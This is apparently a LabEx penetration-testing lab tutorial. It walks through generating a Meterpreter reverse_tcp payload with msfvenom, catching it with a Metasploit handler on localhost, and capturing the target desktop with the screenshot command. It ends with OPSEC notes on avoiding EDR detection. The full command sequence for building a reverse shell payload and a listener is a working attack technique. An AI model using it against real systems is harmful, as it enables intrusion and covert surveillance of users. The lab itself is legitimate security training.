LabEx
Log InJoin Free

Capture the Target Desktop with screenshot in Meterpreter

Kali LinuxBeginner
Practice Now

Introduction

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It is a core component of the Metasploit Framework and is used for post-exploitation activities on a compromised system. One of its many powerful features is the ability to interact with the target's desktop.

In this lab, you will learn how to use the screenshot command within a Meterpreter session. This command allows an attacker to capture an image of the target's current desktop, providing valuable intelligence about the user's activities, open applications, and sensitive information that might be visible on the screen.

Establish a Meterpreter session on a graphical target

In this step, you will simulate a complete attack cycle on a single machine. You will use msfvenom to create a payload, msfconsole to set up a listener, and then execute the payload to establish a Meterpreter session with your own machine. This is a safe and common way to practice penetration testing techniques.

First, open a terminal and use msfvenom to generate a Linux Meterpreter payload. This command creates an executable file that, when run, will connect back to our listener.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
  • -p: Specifies the payload to use.
  • LHOST=127.0.0.1: The "listening host" IP address. We use 127.0.0.1 because our listener will be on the same machine.
  • LPORT=4444: The port to connect back to.
  • -f elf: The output format, which is an executable for Linux.
  • -o: The output file name.

Next, make the generated payload executable:

chmod +x ~/project/payload.elf

Now, you need to set up the listener to catch the connection from the payload. Start the Metasploit Framework console in quiet mode:

msfconsole -q

Inside msfconsole, configure the multi/handler to listen for the incoming connection. Type the following commands one by one:

use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444

Now, run the listener as a background job so you can still use the console:

exploit -j

You should see a message that the handler has started. Now, you need to execute the payload. Open a new, second terminal tab by clicking the + icon in the terminal window. In this new tab, run the payload you created:

~/project/payload.elf

Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session was opened. To verify and interact with it, list the active sessions:

sessions -l

You will see your new session with an ID, likely 1. Interact with it using its ID:

sessions -i 1

Your prompt should change to meterpreter >, confirming you are now in control of the session.

Use the screenshot command to capture the screen

In this step, you will use a simple but powerful Meterpreter command to capture the target's desktop. Now that you have an active Meterpreter session (indicated by the meterpreter > prompt), you can execute commands on the compromised system.

The screenshot command is straightforward. It captures the entire screen of the interactive user's desktop session on the target machine.

From your meterpreter > prompt, simply type the command and press Enter:

screenshot

Meterpreter will take a moment to capture the screen and transfer the image data back to your attacker machine (your LabEx VM). Upon success, it will print a message indicating where the screenshot has been saved. The filename will be a random string of characters with a .jpeg extension.

The output will look similar to this:

Screenshot saved to: /home/labex/project/qKxRzYnL.jpeg

You have now successfully captured the target's desktop. The image file is stored locally on your machine, ready for you to view.

Locate the saved image file on your Kali machine

In this step, you will locate the screenshot file that was just saved to your local machine. The screenshot command automatically saves the captured image to the directory from which you launched msfconsole, which in our case is ~/project.

First, exit the Meterpreter session to return to the msfconsole prompt. You can do this by typing exit:

exit

Now, exit msfconsole to return to your regular zsh terminal prompt:

exit

You are now back in your standard terminal. To confirm the file is there, use the ls -l command to list the contents of your project directory in detail.

ls -l ~/project

You should see the .jpeg file in the list, along with the payload.elf file you created earlier. The output will look something like this, though the JPEG filename will be different:

-rwxr-xr-x 1 labex labex 101368 Nov 21 14:30 payload.elf
-rw-r--r-- 1 labex labex  54321 Nov 21 14:35 qKxRzYnL.jpeg

This confirms that the screenshot was successfully transferred and saved to your machine.

View the captured screenshot

In this step, you will view the image you captured. Since the LabEx environment includes a graphical desktop, you can use an image viewer directly from the command line to see the contents of the screenshot.

We will use ristretto, a simple image viewer for the Xfce desktop environment. To open the screenshot, you will run the ristretto command followed by the path to the image file.

You must replace FILENAME.jpeg with the actual random filename of the screenshot you located in the previous step. For example, if your file is named qKxRzYnL.jpeg, you would use that name.

Execute the following command in your terminal, making sure to use your actual filename:

ristretto ~/project/FILENAME.jpeg

An image viewer window will open, displaying the screenshot. Because you ran the payload on your own machine, the screenshot will be of your own LabEx desktop! This is an excellent way to confirm that the command worked exactly as expected. You can close the image viewer window when you are done.

Discuss operational security concerns of this action

In this step, we will discuss the Operational Security (OPSEC) implications of using the screenshot command during a real penetration test. While it's a very useful command, it's not without risks.

1. Creating Noise and Triggering Alerts: The screenshot command works by interacting with the target operating system's graphical APIs (like GDI on Windows or X11 on Linux). Advanced security products like Endpoint Detection and Response (EDR) or antivirus software monitor these API calls. A process that doesn't normally interact with the desktop suddenly taking a screenshot is a highly suspicious activity that can trigger an alert and expose your presence to security analysts.

2. Leaving Evidence: The command results in an image file being created on the attacker's machine. This file is direct evidence of the intrusion and the specific actions taken. If your attacking machine were ever to be seized or compromised, this data could be used to understand the scope of your activities.

3. Target-Side Artifacts: Although the final image file is saved on your machine, the act of capturing the screen can leave temporary artifacts on the target system. This could include traces in system memory or logs generated by security software that detected the suspicious action. A skilled forensic investigator might be able to find evidence that a screenshot was taken even without finding the image itself.

In a real engagement, you must use commands like screenshot judiciously. It is best used when you have a high degree of confidence that the target system lacks advanced monitoring, or when the potential intelligence gain outweighs the significant risk of detection.

Summary

In this lab, you gained hands-on experience with a fundamental post-exploitation technique. You successfully learned how to establish a Meterpreter session and use the screenshot command to capture the desktop of a target system.

You walked through the entire process:

  • Generating a payload with msfvenom.
  • Setting up a listener with msfconsole.
  • Executing the payload to gain a reverse shell.
  • Interacting with the Meterpreter session.
  • Capturing the screen and viewing the resulting image.
  • Considering the operational security (OPSEC) risks involved.

This skill is a valuable part of any penetration tester's toolkit, providing a direct way to gather visual intelligence from a compromised host. Congratulations on completing the lab!

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux